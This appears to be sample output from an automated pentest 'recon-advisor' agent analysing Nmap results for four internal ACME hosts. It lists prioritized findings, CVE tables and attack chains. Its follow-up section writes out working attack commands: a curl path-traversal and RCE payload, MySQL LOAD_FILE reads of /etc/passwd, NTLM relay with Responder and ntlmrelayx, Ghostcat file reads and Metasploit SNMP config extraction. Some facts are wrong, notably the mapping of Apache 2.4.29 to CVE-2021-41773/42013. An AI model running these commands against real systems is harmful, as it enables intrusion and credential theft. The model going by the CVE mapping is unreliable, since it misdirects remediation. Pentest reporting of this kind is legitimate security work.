Nmap Scan Analysis Report
March 29, 2026 ยท View on GitHub
Sample Output: Generated by the
recon-advisoragent. This demonstrates automated analysis of Nmap scan results with prioritized findings, CVE mappings, and actionable follow-up recommendations.
Nmap Scan Analysis Report
Raw Scan Output
The following Nmap scan was executed against the 10.10.1.0/24 subnet (Server VLAN) during an internal penetration test.
Scan Command:
nmap -sS -sV -O -A --script=default,vuln -T4 -p- 10.10.1.50-53 -oA server_vlan_scan
Raw Results
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 09:23 EDT
Nmap scan report for web01.corp.acme.local (10.10.1.50)
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: ACME Internal Portal
| http-methods:
|_ Potentially risky methods: PUT DELETE
| http-enum:
| /admin/: Admin portal
| /phpmyadmin/: phpMyAdmin
| /.git/HEAD: Git repository found
| /server-status: Apache server-status (accessible)
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=web01.corp.acme.local
| Not valid after: 2024-03-15T00:00:00
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
8080/tcp open http Apache Tomcat 9.0.30
|_http-title: Apache Tomcat/9.0.30
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
MAC Address: 00:50:56:B9:1A:2F (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Nmap scan report for dc-file01.corp.acme.local (10.10.1.51)
Host is up (0.00085s latency).
Not shown: 65528 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-15 13:23:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
|_smb-os-discovery: Windows Server 2019 Standard 17763
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CORP
| NetBIOS_Domain_Name: CORP
| NetBIOS_Computer_Name: DC-FILE01
| DNS_Domain_Name: corp.acme.local
| DNS_Computer_Name: dc-file01.corp.acme.local
| Product_Version: 10.0.17763
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:50:56:B9:3C:7E (VMware)
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019 Build 17763
Network Distance: 1 hop
Host script results:
| smb2-time:
| date: 2024-09-15T13:23:52
|_ start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
Nmap scan report for db01.corp.acme.local (10.10.1.52)
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a5:b7:4c:92:d1:f4:6e:8c:5a:1f:3b:7d:9e:2a:c4:8f (RSA)
| 256 d8:3e:7a:1b:c5:9f:2d:4a:6b:8c:e1:f7:3a:5d:9e:2b (ECDSA)
|_ 256 f1:2a:8b:c4:d7:9e:3f:5a:6b:1c:e8:7d:4f:9a:2e:3b (ED25519)
| ssh-auth-methods:
| Supported authentication methods:
| publickey
|_ password
3306/tcp open mysql MySQL 5.7.29-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.29-0ubuntu0.18.04.1
| Thread ID: 847
| Capabilities flags: 65535
| Some Coverage flags: 15
| Status: Autocommit
| Salt: 5]K\x0Eg7@m#}i%\x17s!Q&N\x03a
|_ Auth Plugin Name: mysql_native_password
| mysql-enum:
| Valid usernames:
| root:<empty> - Valid credentials
|_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
| mysql-databases:
| information_schema
| acme_production
| acme_hr
| wordpress
|_ mysql
MAC Address: 00:50:56:B9:5D:A1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Nmap scan report for mgmt-sw01.corp.acme.local (10.10.1.53)
Host is up (0.0009s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh Cisco SSH 2.0 (protocol 2.0)
| ssh-hostkey:
| 2048 c3:8a:f2:1d:b5:e7:9c:4a:6f:d8:2b:7e:a1:3c:5d:9f (RSA)
161/tcp open snmp SNMPv2c
| snmp-info:
| enterprise: ciscoSystems
| engineIDFormat: mac
| engineIDData: 00:50:56:b9:7f:c2
| snmpEngineBoots: 47
|_ snmpEngineTime: 182d 07:42:19
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
| snmp-sysdescr: Cisco IOS Software, Catalyst 3850 Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.3.5b, RELEASE SOFTWARE
|_ System uptime: 182 days, 7:42:19.00
443/tcp open ssl/http Cisco IOS HTTPS management
|_http-title: Cisco Switch Management
| ssl-cert: Subject: commonName=mgmt-sw01.corp.acme.local
|_ Not valid after: 2023-06-01T00:00:00
8443/tcp open ssl/http Cisco Prime Infrastructure
|_http-title: Cisco Prime Infrastructure
| http-auth:
| HTTP/1.1 401 Unauthorized
|_ Basic realm="Cisco Prime Infrastructure"
MAC Address: 00:50:56:B9:7F:C2 (VMware)
Device type: network device
Running: Cisco IOS 16.X
OS CPE: cpe:/o:cisco:ios:16
OS details: Cisco IOS 16.3.5b
Network Distance: 1 hop
Nmap done: 4 IP addresses (4 hosts up) scanned in 287.34 seconds
Agent Analysis
Prioritized Finding Summary
| Priority | Host | Finding | Severity | CVEs | Immediate Action |
|---|---|---|---|---|---|
| P1 | 10.10.1.52 | MySQL root with empty password | CRITICAL | N/A (misconfiguration) | Restrict access, set password immediately |
| P2 | 10.10.1.50 | Apache 2.4.29: path traversal / RCE | CRITICAL | CVE-2021-41773, CVE-2021-42013 | Patch to 2.4.58+, verify mod_cgi status |
| P3 | 10.10.1.50 | Apache Tomcat 9.0.30: Ghostcat AJP | HIGH | CVE-2020-1938 | Check for AJP connector on 8009, upgrade Tomcat |
| P4 | 10.10.1.51 | SMB signing disabled | HIGH | N/A (misconfiguration) | Enable and require SMB signing via GPO |
| P5 | 10.10.1.50 | Exposed .git directory | HIGH | N/A (misconfiguration) | Block access, rotate any leaked credentials |
| P6 | 10.10.1.53 | SNMP default community strings (public/private) | HIGH | N/A (misconfiguration) | Change community strings, restrict SNMP ACLs |
| P7 | 10.10.1.50 | Expired SSL certificate | MEDIUM | N/A | Renew certificate |
| P8 | 10.10.1.53 | Expired management SSL certificate | MEDIUM | N/A | Renew certificate |
| P9 | 10.10.1.50 | phpMyAdmin exposed | MEDIUM | N/A (misconfiguration) | Restrict access to management IPs only |
| P10 | 10.10.1.50 | Apache server-status accessible | LOW | N/A (misconfiguration) | Restrict to localhost |
Detailed Host Analysis
Host 1: 10.10.1.50 (web01.corp.acme.local), Web Server
OS: Linux 4.15-5.8 (Ubuntu) Role: Internal web portal and application server Risk Level: CRITICAL
Finding 1.1: Apache HTTP Server 2.4.29, Multiple Critical CVEs
Apache 2.4.29 is significantly outdated (released October 2017) and is affected by numerous known vulnerabilities:
| CVE | Severity | Description | CVSS |
|---|---|---|---|
| CVE-2021-41773 | Critical | Path traversal and remote code execution via crafted URI | 9.8 |
| CVE-2021-42013 | Critical | Bypass for CVE-2021-41773 fix, RCE via path traversal | 9.8 |
| CVE-2021-44790 | Critical | Buffer overflow in mod_lua multipart parser | 9.8 |
| CVE-2022-22720 | High | HTTP request smuggling | 9.8 |
| CVE-2022-31813 | High | mod_proxy X-Forwarded-For header bypass | 9.8 |
| CVE-2019-0211 | High | Local privilege escalation via scoreboard manipulation | 7.8 |
Exploitation Path: CVE-2021-41773 allows reading arbitrary files and (if mod_cgi is enabled) executing system commands without authentication. This is a well-known, trivially exploitable vulnerability with public proof-of-concept code.
Finding 1.2: Apache Tomcat 9.0.30, Ghostcat (CVE-2020-1938)
Tomcat 9.0.30 is vulnerable to CVE-2020-1938 (Ghostcat), a critical vulnerability in the Apache JServ Protocol (AJP) connector. If the AJP connector is listening on port 8009 (default), an attacker can:
- Read arbitrary files from the Tomcat webapp directories (including
WEB-INF/web.xmlcontaining credentials) - Achieve remote code execution if file upload is possible
| CVE | Severity | CVSS | Exploit Available |
|---|---|---|---|
| CVE-2020-1938 | Critical | 9.8 | Yes, multiple public exploits |
| CVE-2020-9484 | High | 7.0 | Yes, deserialization via session persistence |
| CVE-2020-11996 | High | 7.5 | Yes, HTTP/2 DoS |
Finding 1.3: Exposed .git Directory
The /.git/HEAD path is accessible, indicating the entire Git repository may be downloadable. This commonly exposes:
- Source code of the application
- Hardcoded credentials and API keys in commit history
- Internal infrastructure details
- Database connection strings
Finding 1.4: phpMyAdmin Exposed
phpMyAdmin is accessible at /phpmyadmin/. Combined with the MySQL root empty-password finding on 10.10.1.52, this could provide direct database administration access if the web server can reach the database server.
Finding 1.5: Risky HTTP Methods Enabled
PUT and DELETE methods are enabled on both ports 80 and 8080. PUT can potentially allow file upload leading to webshell deployment.
Host 2: 10.10.1.51 (dc-file01.corp.acme.local), Windows File Server
OS: Windows Server 2019 Build 17763 Role: File server with Kerberos services (possible secondary DC or domain-joined server with SPN registrations) Risk Level: HIGH
Finding 2.1: SMB Signing Disabled
SMB message signing is disabled on this host. This is a critical misconfiguration that enables:
- NTLM relay attacks: An attacker who intercepts NTLM authentication (via LLMNR/NBT-NS poisoning, mitm6, or PetitPotam) can relay the authentication to this server to execute commands, access shares, or create machine accounts.
- Man-in-the-middle attacks: Traffic between clients and this file server can be tampered with.
This is one of the most commonly exploited misconfigurations in Active Directory environments and frequently leads to domain compromise in real-world engagements.
Finding 2.2: Guest Account SMB Access
The scan indicates SMB authentication via the guest account is possible. This may allow unauthenticated share enumeration and potentially file access.
Finding 2.3: WinRM Enabled (5985/5986)
WinRM is listening on both HTTP (5985) and HTTPS (5986). If credentials or hashes are obtained, this provides a convenient lateral movement vector using tools like Evil-WinRM.
Finding 2.4: RDP Exposed (3389)
RDP is open, which expands the attack surface. Verify NLA is enforced and check for BlueKeep (CVE-2019-0708) if any older OS builds are present.
Host 3: 10.10.1.52 (db01.corp.acme.local), Database Server
OS: Linux 4.15-5.8 (Ubuntu 18.04) Role: MySQL database server Risk Level: CRITICAL
Finding 3.1: MySQL Root with Empty Password
This is the highest-priority finding in this scan. The MySQL root account has no password and is accessible from the network. This provides:
- Complete database access: Full read/write to all databases including
acme_production,acme_hr, andwordpress - Potential file system access: MySQL
LOAD_FILE()andINTO OUTFILEfunctions can read and write files on the server - Potential command execution: If the MySQL server is running with elevated privileges, UDF (User Defined Functions) can be loaded for OS command execution
- Credential harvesting: The
wordpressdatabase likely contains password hashes;acme_hrlikely contains PII
Finding 3.2: MySQL 5.7.29, Known Vulnerabilities
MySQL 5.7.29 has reached end of support and contains known vulnerabilities:
| CVE | Severity | Description |
|---|---|---|
| CVE-2020-14812 | Medium | Server: Locking unspecified vulnerability |
| CVE-2020-14769 | Medium | Server: Optimizer unspecified vulnerability |
| CVE-2020-14765 | Medium | Server: FTS unspecified vulnerability |
| CVE-2021-2307 | Medium | Server: Packaging privilege escalation |
While these CVEs are lower severity, the empty root password makes them largely academic since full access is already available.
Finding 3.3: OpenSSH 7.6p1, Outdated
OpenSSH 7.6p1 is outdated. While no critical RCE vulnerabilities exist for this specific version, it lacks security improvements in newer releases and may be vulnerable to username enumeration (CVE-2018-15473).
Host 4: 10.10.1.53 (mgmt-sw01.corp.acme.local), Network Switch
OS: Cisco IOS 16.3.5b (Catalyst 3850) Role: Network management switch Risk Level: HIGH
Finding 4.1: SNMP Default Community Strings
Both public (read-only) and private (read-write) community strings are active. With private community string access, an attacker can:
- Modify switch configuration: Change VLAN assignments, ACLs, routing
- Extract full running configuration: Including all credentials, SNMP strings, enable secrets
- Disable security controls: Remove ACLs, disable port security, modify spanning tree
- Create persistence: Add rogue SNMP users, modify TACACS/RADIUS configuration
The public community string alone enables extraction of:
- Complete interface inventory and status
- ARP tables (IP-to-MAC mappings for entire VLAN)
- Routing tables
- CDP/LLDP neighbor information (network topology mapping)
Finding 4.2: Cisco IOS 16.3.5b, Outdated
IOS 16.3.5b is several major versions behind current releases. Notable vulnerabilities include:
| CVE | Severity | Description |
|---|---|---|
| CVE-2020-3516 | Medium | Web UI DoS |
| CVE-2021-1385 | Medium | Cisco IOx path traversal |
| CVE-2023-20198 | Critical | IOS XE web UI privilege escalation (check if XE) |
Finding 4.3: Expired SSL Certificate on Management Interface
The SSL certificate for the management HTTPS interface expired on 2023-06-01. This indicates the device may not be regularly maintained and suggests weak lifecycle management.
Finding 4.4: Cisco Prime Infrastructure (Port 8443)
Cisco Prime Infrastructure is running on port 8443 with basic HTTP authentication. Older versions of Cisco Prime have critical vulnerabilities including CVE-2019-15958 (RCE) and CVE-2018-15379 (arbitrary file upload). Version identification should be performed.
Follow-Up Commands
Immediate Priority (P1: MySQL Root Access)
# Verify MySQL root access and enumerate databases
mysql -h 10.10.1.52 -u root -e "SHOW DATABASES; SELECT user,host,authentication_string FROM mysql.user;"
# Check for file read/write privileges
mysql -h 10.10.1.52 -u root -e "SELECT @@secure_file_priv; SELECT LOAD_FILE('/etc/passwd');"
# Enumerate sensitive data
mysql -h 10.10.1.52 -u root -e "SELECT TABLE_SCHEMA, TABLE_NAME, TABLE_ROWS FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT IN ('information_schema','mysql','performance_schema','sys');"
# Check for UDF command execution potential
mysql -h 10.10.1.52 -u root -e "SELECT @@plugin_dir; SHOW VARIABLES LIKE 'have_symlink';"
P2: Apache Path Traversal (CVE-2021-41773)
# Test for path traversal (read /etc/passwd)
curl -s --path-as-is "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
# Test for RCE via mod_cgi (if enabled)
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://10.10.1.50/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
# Check mod_cgi/mod_cgid status
curl -s "http://10.10.1.50/server-status" | grep -i "cgi"
P3: Ghostcat (CVE-2020-1938)
# Check if AJP connector is listening on 8009
nmap -sS -p 8009 10.10.1.50
# If port 8009 is open, exploit Ghostcat to read WEB-INF/web.xml
python3 ajpShooter.py http://10.10.1.50 8009 /WEB-INF/web.xml read
# Alternative: use the PYFUSCATION tool
python3 ghostcat.py 10.10.1.50 -p 8009 -f /WEB-INF/web.xml
P4: SMB Signing Disabled (Relay Attack)
# Confirm SMB signing status across subnet
crackmapexec smb 10.10.1.0/24 --gen-relay-list relay_targets.txt
# Set up NTLM relay targeting 10.10.1.51
ntlmrelayx.py -tf relay_targets.txt -smb2support -socks
# In a separate terminal, start Responder to capture/relay hashes
responder -I eth0 -dwPv
P5: Exposed Git Repository
# Download the full .git directory
git-dumper http://10.10.1.50/.git/ ./git_dump
# Search for credentials in commit history
cd git_dump && git log --all -p | grep -iE "(password|secret|api_key|token|credential)" | head -50
# List all files ever committed
git log --all --diff-filter=A --summary | grep "create mode"
P6: SNMP Default Community Strings
# Full SNMP walk with public community string
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1 > snmp_full_walk.txt
# Extract running configuration via private community string
snmpget -v2c -c private 10.10.1.53 1.3.6.1.4.1.9.9.96.1.1.1.1.0
# Use Metasploit to extract config
msfconsole -q -x "use auxiliary/scanner/snmp/cisco_config_tftp; set RHOSTS 10.10.1.53; set COMMUNITY private; run"
# Enumerate ARP table (map the network)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.2.1.4.22.1.2
# Enumerate CDP neighbors (topology mapping)
snmpwalk -v2c -c public 10.10.1.53 1.3.6.1.4.1.9.9.23.1.2.1
P9: phpMyAdmin + MySQL Access Chain
# Check phpMyAdmin version
curl -s http://10.10.1.50/phpmyadmin/ | grep -oP 'phpMyAdmin \K[0-9.]+'
# If phpMyAdmin connects to 10.10.1.52, verify root access through the web interface
curl -s -c cookies.txt -b cookies.txt "http://10.10.1.50/phpmyadmin/index.php" \
-d "pma_username=root&pma_password=&server=1"
Attack Path Recommendations
Path 1: MySQL to Full Server Compromise (Highest Probability)
MySQL root (no password) on 10.10.1.52
--> Read /etc/shadow via LOAD_FILE()
--> OR write webshell via INTO OUTFILE (if web root writable)
--> OR load UDF for OS command execution
--> Establish reverse shell as mysql user
--> Local privilege escalation (Linux 4.15 kernel exploits / sudo misconfig)
--> Pivot to other hosts
Path 2: Web Server Chain to Internal Network
Apache 2.4.29 path traversal (CVE-2021-41773) on 10.10.1.50
--> Read sensitive files (/etc/passwd, application configs, database credentials)
--> If mod_cgi enabled: direct RCE
--> OR: Ghostcat (CVE-2020-1938) on Tomcat for web.xml credentials
--> OR: .git dump for source code and embedded credentials
--> Access phpMyAdmin with harvested credentials
--> Pivot to database server
Path 3: NTLM Relay to Windows Admin Access
LLMNR/NBT-NS poisoning (broadcast traffic capture)
--> Relay NTLM authentication to 10.10.1.51 (SMB signing disabled)
--> Execute commands via SMB on file server
--> Dump SAM database / cached credentials
--> Access file shares for sensitive documents
--> Lateral movement to other Windows hosts
Path 4: Network Infrastructure Compromise
SNMP private community string on 10.10.1.53
--> Download full switch running configuration
--> Extract enable secret, TACACS credentials
--> Modify VLAN ACLs to access restricted segments
--> Modify spanning tree / routing for traffic interception
--> Pivot to Management VLAN devices
Recommended Primary Attack Chain
The recommended attack chain combines the highest-impact findings for maximum demonstrated risk:
1. MySQL root empty password (10.10.1.52) -- immediate database access
2. Extract credentials from acme_production and wordpress databases
3. Test credential reuse against domain accounts
4. Use Apache path traversal (10.10.1.50) -- file read for additional credentials
5. Dump .git repository for application secrets
6. NTLM relay via SMB signing disabled (10.10.1.51) -- Windows lateral movement
7. SNMP config extraction (10.10.1.53) -- network infrastructure access
8. Combine all access for full attack narrative in report
MITRE ATT&CK Mapping
| Technique ID | Technique Name | Applicable Finding |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Apache CVE-2021-41773, Tomcat CVE-2020-1938 |
| T1046 | Network Service Scanning | Initial Nmap scan, service enumeration |
| T1110.001 | Brute Force: Password Guessing | MySQL empty root password |
| T1078.001 | Valid Accounts: Default Accounts | MySQL root, SNMP public/private |
| T1557.001 | LLMNR/NBT-NS Poisoning and SMB Relay | SMB signing disabled on 10.10.1.51 |
| T1213 | Data from Information Repositories | Database access, file share access |
| T1552.001 | Unsecured Credentials: Credentials in Files | .git repository, server-status, phpMyAdmin |
| T1602.001 | Data from Configuration Repository: SNMP | SNMP default community strings |
| T1021.004 | Remote Services: SSH | SSH access to 10.10.1.52, 10.10.1.53 |
| T1021.001 | Remote Services: RDP | RDP open on 10.10.1.51 |
| T1021.006 | Remote Services: WinRM | WinRM open on 10.10.1.51 |
| T1059 | Command and Scripting Interpreter | Post-exploitation command execution |
| T1005 | Data from Local System | File system access via path traversal |
Analysis generated from Nmap scan data. All findings require manual verification before exploitation. Follow rules of engagement and obtain explicit authorization before executing any exploitation commands.